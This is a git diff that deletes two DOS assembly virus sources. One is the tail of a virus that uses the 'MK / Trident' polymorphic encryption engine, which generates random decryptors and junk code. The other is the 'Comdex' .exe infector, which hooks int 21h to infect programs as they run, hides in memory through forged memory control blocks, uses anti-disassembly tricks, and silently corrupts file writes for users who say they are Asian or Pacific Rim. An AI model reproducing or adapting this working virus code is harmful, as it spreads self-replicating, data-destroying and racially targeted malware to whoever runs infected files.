-;****************************************************************************** - -getlen: mov ax,[di] - mov dx,[di+2] - ret - - -;****************************************************************************** -;* Goto new offset DX:AX -;****************************************************************************** - -gotobegin: xor ax,ax - cwd -goto: xchg cx,dx - xchg ax,dx - mov ax,4200 - int 21 - ret - - -;**************************************************************************** -;* -;* Encryption Engine -;* -;* -;* Input: ES work segment -;* DS:DX code to encrypt -;* BP what will be start of decryptor -;* SI what will be distance between decryptor and code -;* CX length of code -;* AX flags: bit 0: DS will not be equal to CS -;* bit 1: insert random instructions -;* bit 2: put junk before decryptor -;* bit 3: preserve AX with decryptor -;* -;* Output: ES: work segment (preserved) -;* DS:DX decryptor + encrypted code -;* BP what will be start of decryptor (preserved) -;* DI length of decryptor / offset of encrypted code -;* CX length of decryptor + encrypted code -;* AX length of encrypted code -;* (other registers may be trashed) -;* -;**************************************************************************** - - db '[ MK / Trident ]' - -crypt: xor di,di ;di = start of decryptor - push dx ;save offset of code - push si ;save future offset of code - - mov byte ptr ds:[flags],al ;save flags - test al,8 ;push AX? - jz no_push - mov al,50 - stosb - -no_push: call rnd_get ;add a few bytes to cx - and ax,1F - add cx,ax - push cx ;save length of code - - call rnd_get ;get random flags - xchg ax,bx - ;BX flags: - - ;0,1 how to encrypt - ;2,3 which register for encryption - ;4 use byte or word for encrypt - ;5 MOV AL, MOV AH or MOV AX - ;6 MOV CL, MOV CH or MOV CX - ;7 AX or DX - - ;8 count up or down - ;9 ADD/SUB/INC/DEC or CMPSW/SCASW - ;A ADD/SUB or INC/DEC - ; CMPSW or SCASW - ;B offset in XOR instruction? - ;C LOOPNZ or LOOP - ; SUB CX or DEC CX - ;D carry with crypt ADD/SUB - ;E carry with inc ADD/SUB - ;F XOR instruction value or AX/DX - -random: call rnd_get ;get random encryption value - or al,al - jz random ;again if 0 - mov ds:[xor_val],ax - - call do_junk ;insert random instructions - - pop cx - - mov ax,0111 ;make flags to remember which - test bl,20 ; MOV instructions are used - jnz z0 - xor al,07 -z0: test bl,0C - jnz z1 - xor al,70 -z1: test bl,40 - jnz z2 - xor ah,7 -z2: test bl,10 - jnz z3 - and al,73 -z3: test bh,80 - jnz z4 - and al,70 - -z4: mov dx,ax -mov_lup: call rnd_get ;put MOV instructions in - and ax,000F ; a random order - cmp al,0A - ja mov_lup - - mov si,ax - push cx ;test if MOV already done - xchg ax,cx - mov ax,1 - shl ax,cl - mov cx,ax - and cx,dx - pop cx - jz mov_lup - xor dx,ax ;remember which MOV done - - push dx - call do_mov ;insert MOV instruction - call do_nop ;insert a random NOP - pop dx - - or dx,dx ;all MOVs done? - jnz mov_lup - - push di ;save start of decryptor loop - - call do_add_ax ;add a value to AX in loop? - call do_nop - test bh,20 ;carry with ADD/SUB ? - jz no_clc - mov al,0F8 - stosb -no_clc: mov word ptr ds:[xor_offset],0 - call do_xor ;place all loop instructions - call do_nop - call do_add - - pop dx ;get start of decryptor loop - - call do_loop - - test byte ptr ds:[flags],8 ;insert POP AX ? - jz no_pop - mov al,58 - stosb - -no_pop: xor ax,ax ;calculate loop offset - test bh,1 ;up or down? - jz v1 - mov ax,cx - dec ax - test bl,10 ;encrypt with byte or word? - jz v1 - and al,0FE -v1: add ax,di - add ax,bp - pop si - add ax,si - sub ax,word ptr ds:[xor_offset] - mov si,word ptr ds:[where_len] - test bl,0C ;are BL,BH used for encryption? - jnz v2 - mov byte ptr es:[si],al - mov si,word ptr ds:[where_len2] - mov byte ptr es:[si],ah - jmp short v3 -v2: mov word ptr es:[si],ax - -v3: mov dx,word ptr ds:[xor_val] ;encryption value - - pop si ;ds:si = start of code - - push di ;save ptr to encrypted code - push cx ;save length of encrypted code - - test bl,10 ;byte or word? - jz blup - - inc cx ;cx = # of crypts (words) - shr cx,1 - -lup: lodsw ;encrypt code (words) - call do_encrypt - stosw - loop lup - jmp short klaar - - -blup: lodsb ;encrypt code (bytes) - xor dh,dh - call do_encrypt - stosb - loop blup - -klaar: mov cx,di ;cx = length decryptpr + code - pop ax ;ax = length of decrypted code - pop di ;di = offset encrypted code - xor dx,dx ;ds:dx = decryptor + cr. code - push es - pop ds - ret - - -;**************************************************************************** -;* encrypt the code -;**************************************************************************** - -do_encrypt: add dx,word ptr ds:[add_val] - test bl,2 - jnz lup1 - xor ax,dx - ret - -lup1: test bl,1 - jnz lup2 - sub ax,dx - ret - -lup2: add ax,dx - ret - - -;**************************************************************************** -;* generate mov reg,xxxx -;**************************************************************************** - -do_mov: mov dx,si - mov al,byte ptr ds:[si+mov_byte] - cmp dl,4 ;BX? - jne is_not_bx - call add_ind -is_not_bx: test dl,0C ;A*? - pushf - jnz is_not_a - test bl,80 ;A* or D*? - jz is_not_a - add al,2 - -is_not_a: call alter ;insert the MOV - - popf ;A*? - jnz is_not_a2 - mov ax,word ptr ds:[xor_val] - jmp short sss - -is_not_a2: test dl,8 ;B*? - jnz is_not_b - mov si,offset where_len - test dl,2 - jz is_not_bh - add si,2 -is_not_bh: mov word ptr ds:[si],di - jmp short sss - -is_not_b: mov ax,cx ;C* - test bl,10 ;byte or word encryption? - jz sss - inc ax ;only half the number of bytes - shr ax,1 -sss: test dl,3 ;byte or word register? - jz is_x - test dl,2 ;*H? - jz is_not_h - xchg al,ah -is_not_h: stosb - ret - -is_x: stosw - ret - - -;**************************************************************************** -;* insert MOV or alternative for MOV -;**************************************************************************** - -alter: push bx - push cx - push ax - call rnd_get - xchg ax,bx - pop ax - test bl,3 ;use alternative for MOV? - jz no_alter - - push ax - and bx,0F - and al,08 - shl ax,1 - or bx,ax - pop ax - - and al,7 - mov cl,9 - xchg ax,cx - mul cl - - add ax,30C0 - xchg al,ah - test bl,4 - jz no_sub - mov al,28 -no_sub: call maybe_2 - stosw - - mov al,80 - call maybe_2 - stosb - - mov ax,offset add_mode - xchg ax,bx - and ax,3 - xlat - - add al,cl -no_alter: stosb - pop cx - pop bx - ret - - -;**************************************************************************** -;* insert ADD AX,xxxx -;**************************************************************************** - -do_add_ax: push cx - mov si,offset add_val ;save add-value here - mov word ptr ds:[si],0 - mov ax,bx - and ax,8110 - xor ax,8010 - jnz no_add_ax ;use ADD? - - mov ax,bx - xor ah,ah - mov cl,3 - div cl - or ah,ah - jnz no_add_ax ;use ADD? - - test bl,80 - jnz do_81C2 ;AX or DX? - mov al,5 - stosb - jmp short do_add0 -do_81C2: mov ax,0C281 - stosw -do_add0: call rnd_get - mov word ptr ds:[si],ax - stosw -no_add_ax: pop cx - ret - - -;**************************************************************************** -;* generate encryption command -;**************************************************************************** - -do_xor: test byte ptr ds:[flags],1 - jz no_cs - mov al,2E ;insert CS: instruction - stosb - -no_cs: test bh,80 ;type of XOR command - jz xor1 - - call get_xor ;encrypt with register - call do_carry - call save_it - xor ax,ax - test bl,80 - jz xxxx - add al,10 -xxxx: call add_dir - test bh,8 - jnz yyyy - stosb - ret - -yyyy: or al,80 - stosb - call rnd_get - stosw - mov word ptr ds:[xor_offset],ax - ret - -xor1: mov al,080 ;encrypt with value - call save_it - call get_xor - call do_carry - call xxxx - mov ax,word ptr ds:[xor_val] - test bl,10 - jmp byte_word - - -;**************************************************************************** -;* generate increase/decrease command -;**************************************************************************** - -do_add: test bl,8 ;no CMPSW/SCASW if BX is used - jz da0 - test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW - jnz do_cmpsw - -da0: test bh,4 ;ADD/SUB or INC/DEC? - jz add1 - - mov al,40 ;INC/DEC - test bh,1 ;up or down? - jz add0 - add al,8 -add0: call add_ind - stosb - test bl,10 ;byte or word? - jz return - stosb ;same instruction again -return: ret - -add1: test bh,40 ;ADD/SUB - jz no_clc2 ;carry? - mov al,0F8 ;insert CLC - stosb -no_clc2: mov al,083 - stosb - mov al,0C0 - test bh,1 ;up or down? - jz add2 - mov al,0E8 -add2: test bh,40 ;carry? - jz no_ac2 - and al,0CF - or al,10 -no_ac2: call add_ind - stosb - mov al,1 ;value to add/sub -save_it: call add_1 - stosb - ret - -do_cmpsw: test bh,1 ;up or down? - jz no_std - mov al,0FDh ;insert STD - stosb -no_std: test bh,4 ;CMPSW or SCASW? - jz normal_cmpsw - test bl,4 ;no SCASW if SI is used - jnz do_scasw - -normal_cmpsw: mov al,0A6 ;CMPSB - jmp short save_it -do_scasw: mov al,0AE ;SCASB - jmp short save_it - - -;**************************************************************************** -;* generate loop command -;**************************************************************************** - -do_loop: test bh,1 ;no JNE if couting down - jnz loop_loop ; (prefetch bug!) - call rnd_get - test al,1 ;LOOPNZ/LOOP or JNE? - jnz cx_loop - -loop_loop: mov al,0E0 - test bh,1A ;LOOPNZ or LOOP? - jz ll0 ; no LOOPNZ if xor-offset - add al,2 ; no LOOPNZ if CMPSW/SCASW -ll0: stosb - mov ax,dx - sub ax,di - dec ax - stosb - ret - -cx_loop: test bh,10 ;SUB CX or DEC CX? - jnz cxl_dec - mov ax,0E983 - stosw - mov al,1 - stosb - jmp short do_jne - -cxl_dec: mov al,49 - stosb -do_jne: mov al,75 - jmp short ll0 - - -;**************************************************************************** -;* add value to AL depending on register type -;**************************************************************************** - -add_dir: mov si,offset dir_change - jmp short xx1 - -add_ind: mov si,offset ind_change -xx1: push bx - shr bl,1 - shr bl,1 - and bx,3 - add al,byte ptr ds:[bx+si] - pop bx - ret - - -;**************************************************************************** -;* mov encryption command byte to AL -;**************************************************************************** - -get_xor: push bx - mov ax,offset how_mode - xchg ax,bx - and ax,3 - xlat - pop bx - ret - - -;**************************************************************************** -;* change ADD into ADC -;**************************************************************************** - -do_carry: test bl,2 ;ADD/SUB used for encryption? - jz no_ac - test bh,20 ;carry with (encr.) ADD/SUB? - jz no_ac - and al,0CF - or al,10 -no_ac: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -add_1: test bl,10 - jz add_1_ret - inc al -add_1_ret: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -maybe_2: call add_1 - cmp al,81 ;can't touch this - je maybe_not - push ax - call rnd_get - test al,1 - pop ax - jz maybe_not - add al,2 -maybe_not: ret - - -;**************************************************************************** -;* get random nop (or not) -;**************************************************************************** - -do_nop: test byte ptr ds:[flags],2 - jz no_nop -yes_nop: call rnd_get - test al,3 - jz nop8 - test al,2 - jz nop16 - test al,1 - jz nop16x -no_nop: ret - - -;**************************************************************************** -;* Insert random instructions -;**************************************************************************** - -do_junk: test byte ptr ds:[flags],4 - jz no_junk - call rnd_get ;put a random number of - and ax,0F ; dummy instructions before - inc ax ; decryptor - xchg ax,cx -junk_loop: call junk - loop junk_loop -no_junk: ret - - -;**************************************************************************** -;* get rough random nop (may affect register values) -;**************************************************************************** - -junk: call rnd_get - and ax,1E - jmp short aa0 -nop16x: call rnd_get - and ax,06 -aa0: xchg ax,si - call rnd_get - jmp word ptr ds:[si+junkcals] - - -;**************************************************************************** -;* NOP and junk addresses -;**************************************************************************** - -junkcals dw offset nop16x0 - dw offset nop16x1 - dw offset nop16x2 - dw offset nop16x3 - dw offset nop8 - dw offset nop16 - dw offset junk6 - dw offset junk7 - dw offset junk8 - dw offset junk9 - dw offset junkA - dw offset junkB - dw offset junkC - dw offset junkD - dw offset junkE - dw offset junkF - - -;**************************************************************************** -;* NOP and junk routines -;**************************************************************************** - -nop16x0: and ax,000F ;J* 0000 (conditional) - or al,70 - stosw - ret - - -nop16x1: mov al,0EBh ;JMP xxxx / junk - and ah,07 - inc ah - stosw - xchg al,ah ;get lenght of bullshit - cbw - jmp fill_bullshit - - -nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg - stosb - ret - - -nop16x3: call junkF ;INC / DEC or DEC / INC - xor al,8 - stosb - ret - - -nop8: push bx ;8-bit NOP - and al,7 - mov bx,offset nop_data8 - xlat - stosb - pop bx - ret - - -nop16: push bx ;16-bit NOP - and ax,0303 - mov bx,offset nop_data16 - xlat - add al,ah - stosb - call rnd_get - and al,7 - mov bl,9 - mul bl - add al,0C0 - stosb - pop bx - ret - - -junk6: push cx ;CALL xxxx / junk / POP reg - mov al,0E8 - and ah,0F - inc ah - stosw - xor al,al - stosb - xchg al,ah - call fill_bullshit - call do_nop - call rnd_get ;insert POP reg - and al,7 - call no_sp - mov cx,ax - or al,58 - stosb - - test ch,3 ;more? - jnz junk6_ret - - call do_nop - mov ax,0F087 ;insert XCHG SI,reg - or ah,cl - test ch,8 - jz j6_1 - mov al,8Bh -j6_1: stosw - - call do_nop - push bx - call rnd_get - xchg ax,bx - and bx,0F7FBh ;insert XOR [SI],xxxx - or bl,8 - call do_xor - pop bx -junk6_ret: pop cx - ret - - -junk7: and al,0F ;MOV reg,xxxx - or al,0B0 - call no_sp - stosb - test al,8 - pushf - call rnd_get - popf - jmp short byte_word - - -junk8: and ah,39 ;DO r/m,r(8/16) - or al,0C0 - call no_sp - xchg al,ah - stosw - ret - - -junk9: and al,3Bh ;DO r(8/16),r/m - or al,2 - and ah,3F - call no_sp2 - call no_bp - stosw - ret - - -junkA: and ah,1 ;DO rm,xxxx - or ax,80C0 - call no_sp - xchg al,ah - stosw - test al,1 - pushf - call rnd_get - popf - jmp short byte_word - - -junkB: call nop8 ;NOP / LOOP - mov ax,0FDE2 - stosw - ret - - -junkC: and al,09 ;CMPS* or SCAS* - test ah,1 - jz mov_test - or al,0A6 - stosb - ret -mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx - stosb - cmp al,0A8 - pushf - call rnd_get - popf - jmp short byte_word - - -junkD: and al,07 ;XCHG AX,reg - or al,90 - call no_sp - stosb - ret - - -junkE: and ah,07 ;PUSH reg / POP reg - or ah,50 - mov al,ah - or ah,08 - stosw - ret - - -junkF: and al,0F ;INC / DEC - or al,40 - call no_sp - stosb - ret - - -;**************************************************************************** -;* store a byte or a word -;**************************************************************************** - -byte_word: jz only_byte - stosw - ret - -only_byte: stosb - ret - - -;**************************************************************************** -;* don't fuck with SP! -;**************************************************************************** - -no_sp: push ax - and al,7 - cmp al,4 - pop ax - jnz no_sp_ret - and al,0FBh -no_sp_ret: ret - - -;**************************************************************************** -;* don't fuck with SP! -;**************************************************************************** - -no_sp2: push ax - and ah,38 - cmp ah,20 - pop ax - jnz no_sp2_ret - xor ah,20 -no_sp2_ret: ret - - -;**************************************************************************** -;* don't use [BP+..] -;**************************************************************************** - -no_bp: test ah,4 - jnz no_bp2 - and ah,0FDh - ret - -no_bp2: push ax - and ah,7 - cmp ah,6 - pop ax - jnz no_bp_ret - or ah,1 -no_bp_ret: ret - - -;**************************************************************************** -;* write byte for JMP/CALL and fill with random bullshit -;**************************************************************************** - -fill_bullshit: push cx - xchg ax,cx -bull_lup: call rnd_get - stosb - loop bull_lup - pop cx - ret - - -;**************************************************************************** -;* random number generator (stolen from 'Bomber') -;**************************************************************************** - -rnd_init: push cx - call rnd_init0 ;init - and ax,000F - inc ax - xchg ax,cx -random_lup: call rnd_get ;call random routine a few - loop random_lup ; times to 'warm up' - pop cx - ret - -rnd_init0: push dx ;initialize generator - push cx - mov ah,2C - int 21 - in al,40 - mov ah,al - in al,40 - xor ax,cx - xor dx,ax - jmp short move_rnd - -rnd_get: push dx ;calculate a random number - push cx - push bx - mov ax,0 ;will be: mov ax,xxxx - mov dx,0 ; and mov dx,xxxx - mov cx,7 -rnd_lup: shl ax,1 - rcl dx,1 - mov bl,al - xor bl,dh - jns rnd_l2 - inc al -rnd_l2: loop rnd_lup - pop bx - -move_rnd: mov word ptr ds:[rnd_get+4],ax - mov word ptr ds:[rnd_get+7],dx - mov al,dl - pop cx - pop dx - ret - - -;**************************************************************************** -;* tables for engine -;**************************************************************************** - - ; AX AL AH (BX) BL BH CX CL CH -mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5 - - ; nop clc stc cmc cli cld incbp decbp -nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh - - ; or and xchg mov -nop_data16 db 8, 20, 84, 88 - - ; bl/bh, bx, si di -dir_change db 07, 07, 04, 05 -ind_change db 03, 03, 06, 07 - - - ; xor xor add sub -how_mode db 30, 30, 00, 28 - - ; ? add xor or -add_mode db 0, 0C8, 0F0, 0C0 - - -;**************************************************************************** -;* text + buffer -;**************************************************************************** - - db ' Amsterdam = COFFEESHOP! ' - -buffer db 0CDh, 20 ;original code of dummy program - db (BUFLEN-2) dup (?) - - -;**************************************************************************** -;* the (packed) picture routine -;**************************************************************************** - -beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h - db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh - db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh - db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h - db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h - db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h - db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch - db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h - db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh - db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh - db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h - db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch - db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h - db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh - db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh - db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh - db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh - db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h - db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h - db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h - db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h - db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh - db 0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h - db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h - db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h - db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h - db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h - db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h - db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h - db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh - db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch - db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh - db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h - db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh - db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh - db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh - db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h - db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h - db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh - db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h - db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh - db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh - db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h - db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h - db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h - db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h - db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h - db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h - db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh - db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h - db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh - db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh - db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h - db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh - db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h - db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh - db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h - db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h - db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh - db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h - db 072h, 0C0h, 062h, 040h, 00Eh, 06Ch, 07Bh, 047h - db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h - db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh - db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h - db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh - db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h - db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h - db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h - db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h - db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh - db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh - db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh - db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h - db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h - db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h - db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h - db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h - db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h - db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh - db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh - db 02Ah, 0E8h, 0B4h, 0FFh, 072h, 010h, 0B1h, 003h - db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h - db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah - db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h - db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh - db 0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h - db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh - db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah - db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h - db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh - db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h - db 0E9h, 07Dh, 0EBh - -last: - -_TEXT ends - end first - \ No newline at end of file diff --git a/c/COMDEX7 (46).ASM b/c/COMDEX7 (46).ASM deleted file mode 100755 index bad65b0..0000000 --- a/c/COMDEX7 (46).ASM +++ /dev/null @@ -1,805 +0,0 @@ -; The Comdex exibit guide program -; For the Fall 1991 Comdex Las Vegas Convention -; -; -; A short description of the program: -; -; It only affects .exe files. -; Comdex attaches itself to the end of the programs it affects. -; -; When an affected file is run, Comdex copies itself to top of -; free memory, and modifies the memory blocks, in order to hide from -; memory mapping programs. Some programs may overwrite this area, -; causing the computer to crash. If this happens, the user obviously -; deserved it. -; -; Comdex will hook int 21h and when function 4b (exec) is called -; it sometimes will affect the program being run. It will check every -; program that is run for affection, and if it is not already -; affected, it will be. -; -; Comdex will, after 1 hr, one of 16 chance, ask your race or -; nationality prior to executing a file. Af you answer that you -; are asian/pacific rim, one of 256 file writes will have the -; length adjusted downward or the record size reduced, depending -; upon the specific dos call made. -; -; -; Comdex will remove the read-only attribute before trying to -; affect programs. -; -; Affected files can be easily recognized, since they always end in -; "COMD" -; -; To check for system affection, a byte at 0:33c is used - if it -; contains a 069h, Comdex is installed in memory. -; -; -comsiz equ 128 ;in paragraphs - -code segment para public 'code' - assume cs:code,ds:nothing,ss:nothing,es:nothing - -; -; Comdex is basically divided in the following parts. -; -; 1. the main program - run when an affected program is run. -; it will check if the system is already affected, and if not -; it will install Comdex. -; -; 2. the new int 17 handler. adjusts two ascii output chars. -; -; 3. the new int 14 handler. -; -; 4. the new int 8 handler. -; -; 5. the new int 9 handler. -; -; 6. the new int 21 handler. it will look for exec calls, and -; affect the program being run. -; -; -; this is a fake mcb (memory control block) -; ms-dos inspects the chain of mcbs whenever a memory block allocation, -; modification, or release function is requested, or when a program -; is execed or terminated... -; - db 'Z',00,00,comsiz,0,0,0,0,0,0,0,0,0,0,0,0 -; ^___ # of paragraphs of the controlled mem blk - - - -Comdex proc far -; -; Comdex starts by pushing the original start address on the stack, -; so it can transfer control there when finished. -; -labl: sub sp,4 - push bp - mov bp,sp - push ax -;following line nuked for ease of test -; nop ;added so that scan84 doesn't id as [ice-3] - mov ax,es -; -; put the the original cs on the stack. the add ax,data instruction -; is modified by Comdex when it affects other programs. -; - db 05h ;this is an add ax,10h -org_cs dw 0010h - mov [bp+4],ax -; -; put the the original ip on the stack. this mov [bp+2],data instruction -; is modified by Comdex when it affects other programs. -; - db 0c7h,46h,02h -org_ip dw 0000h -; -; save all registers that are modified. -; - push es - push ds - push bx - push cx - push si - push di -; -; check if already installed. quit if so. -; - mov ax,0 - mov es,ax ;zero es - cmp es:[33ch],byte ptr 069h -;&& -; jne l1 -; -; restore all registers and return to the original program. -; -exit: pop di - pop si - pop cx - pop bx - pop ds - pop es - pop ax - pop bp - retf -; -; Comdex tries to hide from detection by modifying the memory block it -; uses, so it seems to be a block that belongs to the operating system. -; -; it looks rather weird, but it seems to work. -; -l1: mov ah,52h - call int21 ;undefined dos call!!? - mov ax,es:[bx-2] - nop - mov es,ax - add ax,es:[0003] - inc ax - inc ax - mov cs:[0001],ax -; -; next, Comdex modifies the memory block of the affected program. -; it is made smaller, and no longer the last block. -; - mov bx,ds - dec bx - nop - mov ds,bx - mov al,'M' - mov ds:[0000],al - mov ax,ds:[0003] - sub ax,comsiz - mov ds:[0003],ax - add bx,ax - inc bx -; -; then Comdex moves itself to the new block. -; - mov es,bx - xor si,si - xor di,di - push cs - pop ds - mov cx,652h ;the length of this program - - ;be *sure* to update this!! - ;in fact, make it symbolic!! - cld - rep movsb -; -; Comdex then transfers control to the new copy of itself. -; - push es - nop - mov ax,offset l3 - push ax - retf - db 3dh ;confuse disassemblers -; -; zero some variables -; -l3: mov byte ptr cs:[min60],0 - mov byte ptr cs:[min50],0 - mov word ptr cs:[timer],0 - mov byte ptr cs:[input_char],0 -; -; set flag to confirm installation -; - xor ax,ax - mov es,ax - inc ax ;dummy operation to confuse function - mov byte ptr es:[33ch],069h -; -; hook interrupt 21: -; (the primary dos function interrupt) -; - mov ax,es:[0084h] - mov cs:[old21],ax - mov ax,es:[0086h] - nop - mov cs:[old21+2],ax - mov ax,cs - mov es:[0086h],ax - mov ax,offset new21 - mov es:[0084h],ax -; -; hook interrupt 17: -; (bios lpt services) -; - mov ax,es:[005ch] - mov cs:[old17],ax - nop - mov ax,es:[005eh] - mov cs:[old17+2],ax - inc ax ;dummy op - mov ax,cs - mov es:[005eh],ax - mov ax,offset new17 - mov es:[005ch],ax - -; -; hook interrupt 14: -; (bios serial port services) -; -; mov ax,es:[0050h] -; mov cs:[old17],ax -; mov ax,es:[0052h] -; mov cs:[old14+2],ax -; mov ax,cs -; mov es:[0052h],ax -; mov ax,offset new14 -; mov es:[0050h],ax -; -; -; - cmp word ptr cs:[noinf],5 - jg hook8 - jmp exit -; -; hook interrupt 9 -; (bios keyboard interrupt) -; -;hook9: mov ax,es:[0024h] -; mov cs:[old9],ax -; mov ax,es:[0026h] -; mov cs:[old9+2],ax -; mov ax,cs -; mov es:[0026h],ax -; mov ax,offset new9 -; mov es:[0024h],ax -; -; hook interrupt 8 -; (timer ticks) -; - db 3dh,0cch,03h,3dh,3dh ;confuse dissassemblers -hook8: mov ax,es:[0020h] - mov cs:[old8],ax - mov ax,es:[0022h] - mov cs:[old8+2],ax - mov ax,cs - nop - mov es:[0022h],ax - mov ax,offset new8 - mov es:[0020h],ax - jmp exit - - -;the int 21 calls go through this routine to confuse the issue: -int21: push ax - mov ax,0ffh - mov word ptr cs:[internal],ax ;set internal int 21 flag - mov al,20h - inc al ;put 21 in al - mov byte ptr 